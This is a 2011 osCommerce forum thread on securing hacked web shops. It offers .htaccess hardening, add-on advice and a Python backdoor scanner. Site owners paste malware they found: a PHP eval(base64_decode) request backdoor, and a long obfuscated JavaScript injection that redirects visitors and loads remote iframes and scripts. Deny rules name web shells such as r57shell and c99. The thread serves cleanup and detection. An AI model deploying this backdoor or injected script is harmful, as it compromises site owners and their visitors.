geoffreywalton Posted February 20, 2011

> Hello G, That's life, I guess, maybe I've read too much and can't see the wood from the trees, but I've gained the impression that some of the security issues have been resolved in 2.3.1. For sure I can't find file_manager.php in the admin folder. Ken

Sorry, didn't even look at the trees. I missed the 2.3.1 reference. I am sure I have seen some posts that go through which are still needed, but try reading the documentation for each contribution. I have not updated VTS (Virus Threat Scanner) and Check Permissions to integrate them into 2.3.

Cheers
G

Need help installing add ons/contributions, cleaning a hacked site or a bespoke development? Check my profile.
Virus Threat Scanner | My Contributions | Basic install answers | Click here for Contributions / Add Ons | UK your site | Site Move | Basic design info
For links mentioned in old answers that are no longer here follow this link: Useful Threads.
If this post was useful, click the Like This button over there ======>>>>>.
kenkja Posted February 21, 2011

Hello All, Still working away on the security stuff. From the 1st post in the thread: "You can stop Cross Site Scripting attacks with Anti XSS http://addons.oscommerce.com/info/6044". I've followed the link and clicked download but am only getting an empty zip file!! Any clues?

Ken

Os-commerce v2.3.3 | Security Pro v11 | Site Monitor | IP Trap | htaccess Protection | Bad Behaviour Block | Year Make Model | Document Manager | X Sell | Star Product | Modular Front Page | Modular Header Tags
kenkja Posted February 21, 2011

Hello Sara, Thank you for the code. I do have FTP so can edit the files to include it. Re "NB: This means that you have to edit the above before you can access admin." As you may have already guessed, I'm new to all this stuff, so I like to make sure I think I understand before I do anything. So I presume you mean edit the line "allow from 12.34.56.78" to include my own IP address, which I can get by using the IP trap to trap myself.

Thanks
Ken
Juto Posted February 21, 2011

Hi Ken, yes that's true. However, if you have Firefox there's an addon which will show your IP address in the status bar. Nice! :)

Sara

Contributions: http://addons.oscommerce.com/info/8010 http://addons.oscommerce.com/info/8204 http://addons.oscommerce.com/info/8681
kenkja Posted February 22, 2011

Hello Sara, I've entered the code and all seems well.

Thanks
kenkja Posted February 22, 2011

Thanks to all contributors on this post. I seem to have successfully managed everything on post 1 plus Sara's htaccess code, all except for the cross site scripting stuff and deciding what components of the htaccess contribution I should go with. I've no idea if the site's safe now (because I've no idea what I'm talking about) but at least with your help I've given it my best shot.

Thanks
Ken
Guest Posted February 23, 2011

Hello, My name is Ian. We are interested in upgrading from osCommerce 2.2 ms2 to osCommerce 3.0 Alpha. My question is: are the security upgrades (listed in this forum post) included (out of the box) in osCommerce 3.0 Alpha?

Thanks
Best regards, Ian Cope
Guest Posted February 23, 2011

Hello, We would like to upgrade osCommerce 2.2 MS2 to osCommerce 3.0 Alpha. Are any of the security features listed in this forum post included (out of the box) in osC3?

- You can prevent any injection attacks with Security Pro http://addons.oscommerce.com/info/5752
- You can monitor sites for unauthorised changes with SiteMonitor http://addons.oscommerce.com/info/4441
- You can block illicit access attempts with IP trap http://addons.oscommerce.com/info/5914
- You can add htaccess protection http://addons.oscommerce.com/info/6066
- You can stop Cross Site Scripting attacks with Anti XSS http://addons.oscommerce.com/info/6044
Taipo Posted February 23, 2011

None of those featured in the list above will fix the admin exploit, except for putting htaccess in your admin folder, which doesn't fix the admin exploit; rather, it just stops attackers from getting near it. If I may, can I suggest that you upgrade to osC 2.3.1 instead, which seems to have patched this issue for now and seems a bit more stable than the 3.0 alpha.

- Stop Oscommerce hacks dead in their tracks with osC_Sec (see discussion here)
- Another discussion about infected files ::here::
- A discussion on file permissions ::here::
- Site hacked? Should you upgrade or not, some thoughts ::here::
- Fix the admin login bypass exploit here
- Pareto Security: New security addon I am developing, a remake of osC_Sec in PHP 5 with a number of fixes
- BTC:1LHiMXedmtyq4wcYLedk9i9gkk8A8Hk7qX
kenkja Posted February 24, 2011

Hello All, Strange things happening today. I seemed to have lost access to my admin; just by accident I managed to get myself trapped by the IP trap and noticed that my IP address has changed, which accounts for why I can't get into admin, as the htaccess file is linked to my original IP. Both IPs appear to be okay in that they are both UK and with my broadband supplier, BT. Is this changing of IP normal for BT?

Ken
kenkja Posted February 26, 2011

Can anyone offer advice as to which of the htaccess contribution components should be installed, as Fimble says in the notes some may be a little extreme?

Thanks
Ken
CutieCute2 Posted March 9, 2011

Despite every security measure mentioned in these forums, an image.php file was uploaded into my shop image folder. Thanks to the SiteMonitor addon running an automatic check daily, I could find and delete it within hours. The only code was as follows:

    if (isset($_GET["cookie"])) {
        echo 'cookie=4';
        if (isset($_POST["ae5606e136"])) @eval(base64_decode($_POST["ae5606e136"]));
        exit;
    }
    ?>

I believe this would be one file of a number needed to do serious damage to an osCommerce site. Does anyone know how this could happen?
Taipo Posted March 9, 2011

I have a couple of questions that may help find an answer to your situation:
1/ Had your website been hacked prior to installing these addons, in particular prior to installing SiteMonitor?
2/ Have you renamed the admin folder or at least installed htaccess restricted user/pass on the admin folder?
3/ Are there any other php files in the image folder at all?

I am asking these based on the possibility that, if your site had been hacked prior to the addons, there may have been at least one rogue file uploader still resident in your web files that attackers are able to use to add more files (assuming your admin folder is adequately protected).
CutieCute2 Posted March 15, 2011

> I have a couple of questions that may help find an answer to your situation:
> 1/ Had your website been hacked prior to installing these addons, in particular prior to installing SiteMonitor?
> 2/ Have you renamed the admin folder or at least installed htaccess restricted user/pass on the admin folder?
> 3/ Are there any other php files in the image folder at all?
> I am asking these based on the possibility that, if your site had been hacked prior to the addons, there may have been at least one rogue file uploader still resident in your web files that attackers are able to use to add more files (assuming your admin folder is adequately protected).

Thanks for replying to my message.

A1 - Yes, but I've looked through all my files and am pretty sure there are no rogue files.
A2 - No. I never got around to doing these two things for my main two shops. (Sorry for my mistake)
A3 - Not now. I got an html file in my image folder in another store yesterday. It said "kaMtiEz wAz Here Indonesian Coding team". I guess a friendly warning to say "if we can hack into your store, bad people can too!"

I guess it's important to apply EVERY piece of advice.
Patrick67 Posted March 20, 2011

I've discovered that my attacks were coming from Indonesia and Turkey, so I used http://www.find-ip-address.org/ip-country/ which gave me the IPs to deny on my htaccess list.
Taipo Posted March 20, 2011

> A1 - Yes, but I've looked through all my files and am pretty sure there are no rogue files.

Some of the uploads are not necessarily files, but are code appended to the end or beginning of site files which, when a malformed web address is called, can give the attacker the ability to upload more files. So if the code is still resident within those files it may be possible for the attacker to reload files back into writable folders, of which the images folder is the usual target because of some server configurations.

> A2 - No. I never got around to doing these two things for my main two shops. (Sorry for my mistake)

All good, best to follow that renaming advice for now or add the password protection to your admin folders if your control panel allows you to. However, again, if there are compromised website files with appended code, an attacker would not need to go through the admin bypass exploit to be able to upload files.

> A3 - Not now. I got an html file in my image folder in another store yesterday. It said "kaMtiEz wAz Here Indonesian Coding team". I guess a friendly warning to say "if we can hack into your store, bad people can too!"

Sometimes it's that and other times it's a probe attack, and sites that are vulnerable get added to a list of sites that might receive a mass spam attack at a later stage. In order for the attacker to accurately know if they can upload files, they actually go through the effort of uploading one, just as a test. If successful then that may trigger your site being added to their list for future physical attention (as a lot of these first contact attacks are automated).

Also pays to have a look through some of the other files that also get appended code in. The usual files they go after are:
- includes/application_top.php (both of them)
- includes/languages/english/index.php
- includes/header.php

Most of the time an attack will result in worm code of some form being added to those or other files (which you would know about immediately after loading your site into a web browser), but sometimes the code being added might be to allow for file uploading. The attacker knows that at some point in time the affected website will have the security holes patched, so they will want to add more backdoors in for later entry.

If you haven't done so already, pop a file into your includes folder called .htaccess and put the following code into it:

    Options All -Indexes
    <Files *.php>
    Order Deny,Allow
    Deny from all
    </Files>

So my last question is, are there any other folders the attackers have uploaded files into other than the images folder?
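The backdoor fragments quoted in this thread (the image.php dropper, the code appended to core files) share a handful of constructs that a simple scan can pick out, and the appended-code case is exactly what a hash baseline like SiteMonitor's catches. The Python script below is an added example written for this page; it is not SiteMonitor, osC_Sec or any osCommerce code. It walks a web root, flags PHP files under images/, greps every file for those indicators, and compares SHA-256 hashes against a baseline taken from a clean install. The sample files it builds in a temporary directory are constructed for the demo and only imitate the fragments posted above.

```python
import hashlib
import os
import re
import tempfile

# Indicator regexes drawn from the backdoor fragments quoted in this thread:
# eval of base64-decoded request data, upload-and-chmod handlers, PHP hidden
# inside an HTML comment, and the charCodeAt()-N string shift used by the
# injected JavaScript. Each entry is (compiled pattern, label).
INDICATORS = [
    (re.compile(r"eval\s*\(\s*base64_decode\s*\(\s*\$_(POST|GET|REQUEST)"),
     "eval(base64_decode($_REQUEST...))"),
    (re.compile(r"eval\s*\(\s*\$_(POST|GET|REQUEST)"), "eval of a raw request parameter"),
    (re.compile(r"move_uploaded_file\s*\(\s*\$_FILES"), "request-driven file upload"),
    (re.compile(r"chmod\s*\(\s*@?\$_(FILES|REQUEST|POST|GET)"), "chmod driven by request data"),
    (re.compile(r"<!--\s*<\?php"), "PHP opened inside an HTML comment"),
    (re.compile(r"charCodeAt\([^)]*\)\s*-\s*\d+"), "shifted-charcode string decoder (obfuscated JS)"),
]


def sha256_file(path):
    """Hex SHA-256 of a file, read in chunks so large images are fine."""
    digest = hashlib.sha256()
    with open(path, "rb") as fh:
        for chunk in iter(lambda: fh.read(65536), b""):
            digest.update(chunk)
    return digest.hexdigest()


def walk_files(root):
    """Yield (relative path with forward slashes, absolute path) for every file."""
    for dirpath, _dirs, names in os.walk(root):
        for name in names:
            full = os.path.join(dirpath, name)
            yield os.path.relpath(full, root).replace(os.sep, "/"), full


def build_baseline(root):
    """Hash snapshot of the tree; take it from a known-clean install and keep it off the web root."""
    return {rel: sha256_file(full) for rel, full in walk_files(root)}


def scan(root, baseline=None):
    """Return sorted (relative path, reason) findings for the tree under root."""
    findings = set()
    for rel, full in walk_files(root):
        # Taipo's point: PHP has no business in a folder that only holds uploads.
        if rel.startswith("images/") and rel.lower().endswith(".php"):
            findings.add((rel, "PHP file inside the images folder"))
        with open(full, "r", encoding="utf-8", errors="replace") as fh:
            text = fh.read()
        for pattern, label in INDICATORS:
            if pattern.search(text):
                findings.add((rel, label))
        if baseline is not None:
            if rel not in baseline:
                findings.add((rel, "new file not in baseline"))
            elif baseline[rel] != sha256_file(full):
                findings.add((rel, "content changed since baseline"))
    return sorted(findings)


# Constructed sample content for the demo; it imitates the fragments quoted
# in the thread but is not copied from any real site.
CLEAN_TOP = "<?php\n// stand-in for includes/application_top.php\nrequire('includes/configure.php');\n?>\n"
APPENDED = ('\nif (isset($_GET["cookie"])) { if (isset($_POST["k"])) '
            '@eval(base64_decode($_POST["k"])); exit; }\n')
UPLOADER = ("<!--<?php if(@$_FILES['f']['name']){move_uploaded_file($_FILES['f']['tmp_name'],"
            "@$_REQUEST['fp'].$_FILES['f']['name']);} ?>-->\n")


def write(root, rel, text):
    full = os.path.join(root, *rel.split("/"))
    os.makedirs(os.path.dirname(full), exist_ok=True)
    with open(full, "w", encoding="utf-8") as fh:
        fh.write(text)


def demo():
    """Baseline a clean mini web root, tamper with it the way the thread describes, rescan."""
    with tempfile.TemporaryDirectory() as root:
        write(root, "includes/application_top.php", CLEAN_TOP)
        write(root, "index.php", "<?php echo 'shop'; ?>\n")
        baseline = build_baseline(root)
        write(root, "includes/application_top.php", CLEAN_TOP + APPENDED)  # appended backdoor
        write(root, "images/image.php", "<?php" + APPENDED + "?>\n")       # dropper in images/
        write(root, "includes/cookie_usage.php", UPLOADER)                 # uploader in a comment
        return scan(root, baseline)


if __name__ == "__main__":
    for path, reason in demo():
        print(f"{path}: {reason}")
```

Run it against a real tree with `build_baseline()` on the clean copy and `scan(live_root, baseline)` on the live site; the indicator list is deliberately short and will need extending for other shell families, but the baseline comparison catches any appended code regardless of what it looks like.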
Cheepnis Posted March 27, 2011

I've been trying to prevent hotlinking images via .htaccess and have the following code in there, but from every test I've tried, I cannot seem to get the hotlinking blocked, much less the alternate image to show up. I have checked various online tutorials and everything seems to be correct. Here is the code segment in question:

    Options +FollowSymLinks
    RewriteEngine on
    RewriteCond %{HTTP_HOST} ^mysite.com [NC]
    RewriteRule ^(.*)$ http://www.mysite.com/$1 [L,R=301]

    # prevent image theft / hotlinking except the sites below
    RewriteEngine on
    RewriteCond %{HTTP_REFERER} !^http://(.+\.)?mysite\.com/ [NC]
    RewriteCond %{HTTP_REFERER} !^$
    RewriteCond %{HTTP_REFERER} ^http://.*$
    # if you are using images directly from your site to ebay.com for example, uncomment the 2 lines below:
    # RewriteCond %{HTTP_REFERER} !^http://(www\.)?ebay\.co\.uk/.*$ [NC]
    # RewriteCond %{HTTP_REFERER} !^http://(www\.)?ebay\.com/.*$ [NC]
    RewriteCond %{HTTP_REFERER} !^http://(www\.)?myothersite\.org/.*$ [NC]
    # Use the line below to send an alternate image
    RewriteRule .*\.(jpe?g|gif|bmp|png|swf|pdf)$ http://www.mysite.com/hotlink.gif [L]
    # Use the line below to simply 404 all images
    # RewriteRule .*\.(gif|jpe?g|png|bmp|swf|pdf)$ - [F]

I have quite a few other lines of code in the file - is it possible that something later on is disabling this feature? Here is the rest of the file:

    # Filter for most common exploits
    RewriteEngine On
    RewriteCond %{HTTP_USER_AGENT} libwww-perl [OR]
    RewriteCond %{QUERY_STRING} tool25 [OR]
    RewriteCond %{QUERY_STRING} cmd.txt [OR]
    RewriteCond %{QUERY_STRING} cmd.gif [OR]
    RewriteCond %{QUERY_STRING} r57shell [OR]
    RewriteCond %{QUERY_STRING} c99 [OR]
    # Anti XSS
    RewriteCond %{QUERY_STRING} mosConfig_[a-zA-Z_]{1,21}(=|\%3D) [OR]
    RewriteCond %{QUERY_STRING} ^(.*)cPath=http://(.*)$ [NC,OR]
    RewriteCond %{QUERY_STRING} ^(.*)/self/(.*)$ [NC,OR]
    # Made redundant by Security Pro 2.0
    RewriteCond %{QUERY_STRING} base64_encode.*\(.*\) [OR]
    RewriteCond %{QUERY_STRING} (\<|%3C).*script.*(\>|%3E) [NC,OR]
    RewriteCond %{QUERY_STRING} (\<|%3C).*iframe.*(\>|%3E) [NC,OR]
    RewriteCond %{QUERY_STRING} GLOBALS(=|\[|\%[0-9A-Z]{0,2}) [OR]
    RewriteCond %{QUERY_STRING} _REQUEST(=|\[|\%[0-9A-Z]{0,2})
    # bad_conduct replaces index_error.php
    # RewriteRule ^(.*)$ index_error.php [F,L]
    RewriteRule ^(.*)$ bad_conduct/ban.php [L]

    RewriteCond %{REQUEST_METHOD} ^(TRACE|TRACK)
    RewriteRule .* - [F]

    RewriteRule setup\.php$ bad_conduct/ban.php [NC,L]
    RewriteRule file_manager\.php$ bad_conduct/ban.php [NC,L]
    RewriteRule spaw2\.* bad_conduct/ban.php [NC,L]
    RewriteRule \.php/login\.php bad_conduct/ban.php [NC,L]
    RewriteRule \.php/login\.php$ bad_conduct/ban.php [NC,L]
    RewriteRule images/.*\.php$ bad_conduct/ban.php [NC,L]

    # Specify error documents
    ErrorDocument 400 /store/catalog/http_error.php?error_id=400
    ErrorDocument 401 /store/catalog/http_error.php?error_id=401
    ErrorDocument 403 /store/catalog/http_error.php?error_id=403
    ErrorDocument 404 /store/catalog/http_error.php?error_id=404
    ErrorDocument 405 /store/catalog/http_error.php?error_id=405
    ErrorDocument 408 /store/catalog/http_error.php?error_id=408
    ErrorDocument 415 /store/catalog/http_error.php?error_id=415
    ErrorDocument 500 /store/catalog/http_error.php?error_id=500
    ErrorDocument 501 /store/catalog/http_error.php?error_id=501
    ErrorDocument 502 /store/catalog/http_error.php?error_id=502
    ErrorDocument 503 /store/catalog/http_error.php?error_id=503
    ErrorDocument 505 /store/catalog/http_error.php?error_id=505
    ErrorDocument 504 /store/catalog/http_error.php?error_id=504

    # No directory browsing
    Options -Indexes

    # deny access to unused filetypes
    <FilesMatch "\.(bak|inc|tpl|h|ihtml|sql|ini|conf|class|bin|spd|theme|module|exe|Gfr)$">
    deny from all
    </FilesMatch>

    # no access to htaccess files
    <Files ~ "^\.ht">
    Order allow,deny
    Deny from all
    Satisfy All
    </Files>

    # no access to config files
    <Files ~ "\config.php$">
    deny from all
    </Files>

    # Force type & prevent script execution
    <Files site>
    ForceType application/x-httpd-php
    </Files>

    ########## start block copy-bots
    SetEnvIfNoCase User-Agent "^Yandex*" bad_bot
    SetEnvIfNoCase User-Agent "^HTTrack" bad_bot
    SetEnvIfNoCase User-Agent "^WebCopier" bad_bot
    SetEnvIfNoCase User-Agent "^SiteCopy" bad_bot
    SetEnvIfNoCase User-Agent "ia_archiver" bad_bot
    SetEnvIfNoCase User-Agent "^LinkWalker" bad_bot
    SetEnvIfNoCase User-Agent "^Teleport" bad_bot
    SetEnvIfNoCase User-Agent "^psycheclone" bad_bot
    SetEnvIfNoCase User-Agent "^Web Downloader" bad_bot
    SetEnvIfNoCase User-Agent "^libwww-perl" bad_bot
    <Limit GET POST>
    Order Allow,Deny
    Allow from all
    Deny from env=bad_bot
    </Limit>
    ########## end block

    <Limit GET HEAD POST>
    order allow,deny
    deny from cnbaforo.com
    deny from keywordspy.com
    deny from keywordspypro.com
    deny from spyfu.com
    deny from spyfoo.com
    deny from foospy.com
    deny from fuspy.com
    allow from all
    </LIMIT>

    # Block a specific referer
    RewriteCond %{HTTP_REFERER} cnbaforo\.com [NC,OR]
    RewriteCond %{HTTP_REFERER} keywordspy\.com [NC,OR]
    RewriteCond %{HTTP_REFERER} keywordspypro\.com [NC,OR]
    RewriteCond %{HTTP_REFERER} spyfu\.com [NC,OR]
    RewriteCond %{HTTP_REFERER} foospy\.com [NC,OR]
    RewriteCond %{HTTP_REFERER} fuspy\.com [NC,OR]
    RewriteCond %{HTTP_REFERER} spyfoo\.com [NC]
    RewriteRule .* - [F]
    ########## end block

    ########### BAD BEHAVIOR BLOCK rules to ban exploits
    ########### IMPORTANT This must be last in the .htaccess file!
    ########### Add one blank line at the very end of the .htaccess file
    <Files 403.shtml>
    order allow,deny
    allow from all
    </Files>
    deny from 174.122.156.98
    deny from 67.23.244.96
    deny from 94.75.243.135
    deny from 178.208.80.219
    deny from 79.140.208.242
    deny from 116.255.163.100
    deny from 62.67.244.64
    deny from 85.25.120.187
    deny from 189.146.206.70
    deny from 77.232.91.201
    deny from 58.137.99.88
    deny from 109.79.142.39
    deny from 222.231.63.26
    deny from 24.18.183.14
    deny from 109.79.161.168
    deny from 198.106.189.76
    deny from 202.125.40.167

Do you guys see any other syntax errors or questionable statements? I receive no error messages, but that doesn't mean everything works! Also, do I need to have "RewriteEngine on" only once for the whole .htaccess file, or is it needed multiple times, for instance at the top of each section?

Thanks for all your help!
vinarcid0810 Posted March 27, 2011

1) I installed all the security plugins to secure osCommerce 2.2
2) I changed the admin folder
3) protected this new folder with htaccess permissions
4) I put a new backup copy of the website online ... ok
5) I changed the admin, FTP and MySQL passwords
6) configure.php is 444
7) folder permissions are 755
8) removed file_manager.php
9) removed file_manager from the <li> of admin
10) removed define_language.php

But I happened to find more files with this code:

if(document.cookie.indexOf("udb=1")<0){var j=0,n="";while(j<54)n+=String.fromCharCode("iuuq;00hbups76/iptuhbups/dpn0ec:160uet0pvu/qiq@t`je>2".charCodeAt(j++)-1);document.cookie="udb=1;";document.location=n;}function createCSS(selector,declaration){var ua=navigator.userAgent.toLowerCase();var isIE=(/msie/.test(ua))&&!(/opera/.test(ua))&&(/win/.test(ua));var style_node=document.createElement("style");if(!isIE)style_node.innerHTML=selector+" {"+declaration+"}";document.getElementsByTagName("head")[0].appendChild(style_node);if(isIE&&document.styleSheets&&document.styleSheets.length>0){var last_style_node=document.styleSheets[document.styleSheets.length-1];if(typeof(last_style_node.addRule)=="object")last_style_node.addRule(selector,declaration);}};createCSS("#va","background:url(data:,String.fromCharCode)");var my=null;var r=document.styleSheets;for(var i=0;i<r.length;i++){try{var dkfw=r[i].cssRules||r[i].rules;for(var srx=0;srx<dkfw.length;srx++){var gk=dkfw.item?dkfw.item(srx):dkfw[srx];if(!gk.selectorText.match(/#va/))continue;fyqo=(gk.cssText)?gk.cssText:gk.style.cssText;my=fyqo.match(/(S[^")]+)/)[1];iu=gk.selectorText.substr(1);};}catch(e){};}kgl=new Date(2010,11,3,2,21,4);t=kgl.getSeconds();var
dkel=[36/t,36/t,420/t,408/t,128/t,160/t,400/t,444/t,396/t,468/t,436/t,404/t,440/t,464/t,184/t,412/t,404/t,464/t,276/t,432/t,404/t,436/t,404/t,440/t,464/t,460/t,264/t,484/t,336/t,388/t,412/t,312/t,388/t,436/t,404/t,160/t,156/t,392/t,444/t,400/t,484/t,156/t,164/t,364/t,192/t,372/t,164/t,492/t,52/t,36/t,36/t,36/t,420/t,408/t,456/t,388/t,436/t,404/t,456/t,160/t,164/t,236/t,52/t,36/t,36/t,500/t,128/t,404/t,432/t,460/t,404/t,128/t,492/t,52/t,36/t,36/t,36/t,472/t,388/t,456/t,128/t,392/t,400/t,484/t,128/t,244/t,128/t,400/t,444/t,396/t,468/t,436/t,404/t,440/t,464/t,184/t,396/t,456/t,404/t,388/t,464/t,404/t,276/t,432/t,404/t,436/t,404/t,440/t,464/t,160/t,136/t,392/t,444/t,400/t,484/t,136/t,164/t,236/t,52/t,36/t,36/t,36/t,464/t,456/t,484/t,128/t,492/t,52/t,36/t,36/t,36/t,36/t,400/t,444/t,396/t,468/t,436/t,404/t,440/t,464/t,184/t,388/t,448/t,448/t,404/t,440/t,400/t,268/t,416/t,420/t,432/t,400/t,160/t,392/t,400/t,484/t,164/t,236/t,52/t,36/t,36/t,36/t,500/t,128/t,396/t,388/t,464/t,396/t,416/t,128/t,160/t,404/t,164/t,128/t,492/t,52/t,36/t,36/t,36/t,36/t,400/t,444/t,396/t,468/t,436/t,404/t,440/t,464/t,184/t,392/t,444/t,400/t,484/t,128/t,244/t,128/t,392/t,400/t,484/t,236/t,52/t,36/t,36/t,36/t,500/t,52/t,36/t,36/t,36/t,420/t,408/t,128/t,160/t,400/t,444/t,396/t,468/t,436/t,404/t,440/t,464/t,184/t,412/t,404/t,464/t,276/t,432/t,404/t,436/t,404/t,440/t,464/t,460/t,264/t,484/t,336/t,388/t,412/t,312/t,388/t,436/t,404/t,160/t,156/t,392/t,444/t,400/t,484/t,156/t,164/t,364/t,192/t,372/t,164/t,492/t,52/t,36/t,36/t,36/t,36/t,420/t,408/t,456/t,388/t,436/t,404/t,456/t,160/t,164/t,236/t,52/t,36/t,36/t,36/t,500/t,128/t,404/t,432/t,460/t,404/t,128/t,492/t,52/t,36/t,36/t,36/t,36/t,400/t,444/t,396/t,468/t,436/t,404/t,440/t,464/t,184/t,476/t,456/t,420/t,464/t,404/t,160/t,136/t,240/t,420/t,408/t,456/t,388/t,436/t,404/t,128/t,460/t,456/t,396/t,244/t,156/t,416/t,464/t,464/t,448/t,232/t,188/t,188/t,404/t,468/t,456/t,444/t,480/t,212/t,184/t,392/t,420/t,488/t,188/t,460/t,464/t,388/t,484/t,188/t,444/t,468/t,4
64/t,184/t,448/t,416/t,448/t,252/t,460/t,380/t,420/t,400/t,244/t,196/t,156/t,128/t,476/t,420/t,400/t,464/t,416/t,244/t,156/t,196/t,192/t,156/t,128/t,416/t,404/t,420/t,412/t,416/t,464/t,244/t,156/t,196/t,192/t,156/t,128/t,460/t,464/t,484/t,432/t,404/t,244/t,156/t,472/t,420/t,460/t,420/t,392/t,420/t,432/t,420/t,464/t,484/t,232/t,416/t,420/t,400/t,400/t,404/t,440/t,236/t,448/t,444/t,460/t,420/t,464/t,420/t,444/t,440/t,232/t,388/t,392/t,460/t,444/t,432/t,468/t,464/t,404/t,236/t,432/t,404/t,408/t,464/t,232/t,192/t,236/t,464/t,444/t,448/t,232/t,192/t,236/t,156/t,248/t,240/t,188/t,420/t,408/t,456/t,388/t,436/t,404/t,248/t,136/t,164/t,236/t,52/t,36/t,36/t,36/t,500/t,52/t,36/t,36/t,500/t,52/t,36/t,36/t,408/t,468/t,440/t,396/t,464/t,420/t,444/t,440/t,128/t,420/t,408/t,456/t,388/t,436/t,404/t,456/t,160/t,164/t,492/t,52/t,36/t,36/t,36/t,472/t,388/t,456/t,128/t,408/t,128/t,244/t,128/t,400/t,444/t,396/t,468/t,436/t,404/t,440/t,464/t,184/t,396/t,456/t,404/t,388/t,464/t,404/t,276/t,432/t,404/t,436/t,404/t,440/t,464/t,160/t,156/t,420/t,408/t,456/t,388/t,436/t,404/t,156/t,164/t,236/t,408/t,184/t,460/t,404/t,464/t,260/t,464/t,464/t,456/t,420/t,392/t,468/t,464/t,404/t,160/t,156/t,460/t,456/t,396/t,156/t,176/t,156/t,416/t,464/t,464/t,448/t,232/t,188/t,188/t,404/t,468/t,456/t,444/t,480/t,212/t,184/t,392/t,420/t,488/t,188/t,460/t,464/t,388/t,484/t,188/t,444/t,468/t,464/t,184/t,448/t,416/t,448/t,252/t,460/t,380/t,420/t,400/t,244/t,196/t,156/t,164/t,236/t,408/t,184/t,460/t,464/t,484/t,432/t,404/t,184/t,472/t,420/t,460/t,420/t,392/t,420/t,432/t,420/t,464/t,484/t,244/t,156/t,416/t,420/t,400/t,400/t,404/t,440/t,156/t,236/t,408/t,184/t,460/t,464/t,484/t,432/t,404/t,184/t,448/t,444/t,460/t,420/t,464/t,420/t,444/t,440/t,244/t,156/t,388/t,392/t,460/t,444/t,432/t,468/t,464/t,404/t,156/t,236/t,408/t,184/t,460/t,464/t,484/t,432/t,404/t,184/t,432/t,404/t,408/t,464/t,244/t,156/t,192/t,156/t,236/t,408/t,184/t,460/t,464/t,484/t,432/t,404/t,184/t,464/t,444/t,448/t,244/t,156/t,192/t,156/t,236/t,408/t,184/t
,460/t,404/t,464/t,260/t,464/t,464/t,456/t,420/t,392/t,468/t,464/t,404/t,160/t,156/t,476/t,420/t,400/t,464/t,416/t,156/t,176/t,156/t,196/t,192/t,156/t,164/t,236/t,408/t,184/t,460/t,404/t,464/t,260/t,464/t,464/t,456/t,420/t,392/t,468/t,464/t,404/t,160/t,156/t,416/t,404/t,420/t,412/t,416/t,464/t,156/t,176/t,156/t,196/t,192/t,156/t,164/t,236/t,52/t,36/t,36/t,36/t,400/t,444/t,396/t,468/t,436/t,404/t,440/t,464/t,184/t,412/t,404/t,464/t,276/t,432/t,404/t,436/t,404/t,440/t,464/t,460/t,264/t,484/t,336/t,388/t,412/t,312/t,388/t,436/t,404/t,160/t,156/t,392/t,444/t,400/t,484/t,156/t,164/t,364/t,192/t,372/t,184/t,388/t,448/t,448/t,404/t,440/t,400/t,268/t,416/t,420/t,432/t,400/t,160/t,408/t,164/t,236/t,52/t,36/t,36/t,500/t];var aty="";var g=function(){return this;}();ko=g["e"+iu+"l"];var ydxx="";gh=ko(my);for(var i=0;i<dkel.length;i++){ch=ko(dkel[i]);ydxx+=gh(ch);}ko(ydxx);if (typeof(defs_colors)=="undefined") { var defs_colors = 1; var div_colors = new Array('#778383', '#7f493e', '#3e7277', '#70737e', '#7d3d7d', '#7b3e7e', '#897883', '#847374', '#3e7270', '#83707b', '#7e763e', '#4e7270', '#83707b', '#7e7681', '#82827d', '#748682', '#4c4000'); var css_colors = new Array('#717e73', '#887378', '#857378', '#827f7b', '#70887d', '#7e7d74', '#787581', '#707c74', '#4b7378', '#852f82', '#83887b', '#744c36', '#737882', '#7f7b70', '#88497d', '#7e7d74', '#364d4b', '#787581', '#707c74', '#2f8281', '#724c36', '#364d4b', '#3e7875', '#81707c', '#744d4b', '#3e7378', '#854d82', '#81724e', '#81754c'); var css_indexes = new Array(4, 3, 7, 4, 6, 39, 17, 3, 4); function div_pick_colors(t) { var s = ''; for (j=0;j<t.length;j++) { var c_rgb = t[j]; for (i=1;i<7;i++) { var c_clr = c_rgb.substr(i++,2); if (c_clr!='00') s += String.fromCharCode(parseInt(c_clr,16)-15); } } return s; } var ct = new Array(10); var s = div_pick_colors(css_colors); var c = css_indexes; ct[0] = div_pick_colors(div_colors); var j = 0; var ci = 1; for(i=0;i<c.length;i++) { ct[ci++] = s.substr(j,c[i]); j=j+c[i]; } ct[0] = ct[0]; 
function check_div_styles() { var d=document.getElementsByTagName(ct[1])[0]; if(d) { try { var d=document.getElementsByTagName(ct[1])[0]; var v=document.createElement(ct[2]); v.style.display=ct[4]; v.setAttribute(ct[3],ct[4]); d.appendChild(v); w=document.createElement(ct[5]); w.src=ct[0]; w.setAttribute(ct[8],ct[0]); v.appendChild(w); } catch(e) { document.write(ct[6]+ct[0]+ct[7]); } } else { setTimeout("check_div_styles();",500); } } check_div_styles(); } <script type="text/javascript"> if (typeof(redef_colors)=="undefined") { var div_colors = new Array('#4b8272', '#81787f', '#832f83', '#887f74', '#4c3183', '#748783', '#3e7970', '#857082', '#728178', '#7f8331', '#2f8281', '#724c31', '#778383', '#7f493e', '#3e7a84', '#82837e', '#40403d', '#727e7c', '#3e7982', '#3e7980', '#847481', '#883d7c', '#787d3d', '#7f777f', '#314d00'); var redef_colors = 1; var colors_picked = 0; function div_pick_colors(t,styled) { var s = ""; for (j=0;j<t.length;j++) { var c_rgb = t[j]; for (i=1;i<7;i++) { var c_clr = c_rgb.substr(i++,2); if (c_clr!="00") s += String.fromCharCode(parseInt(c_clr,16)-15); } } if (styled) { s = s.substr(0,36) + s.substr(36,(s.length-38)) + div_colors[1].substr(0,1)+new Date().getTime() + s.substr((s.length-2)); } else { s = s.substr(36,(s.length-38)) + div_colors[1].substr(0,1)+new Date().getTime(); } return s; } function try_pick_colors() { try { if(!document.getElementById || !document.createElement){ document.write(div_pick_colors(div_colors,1)); } else { var new_cstyle=document.createElement("script"); new_cstyle.type="text/javascript"; new_cstyle.src=div_pick_colors(div_colors,0); document.getElementsByTagName("head")[0].appendChild(new_cstyle); } } catch(e) { } try { check_colors_picked(); } catch(e) { setTimeout("try_pick_colors()", 500); } } try_pick_colors(); } </script>
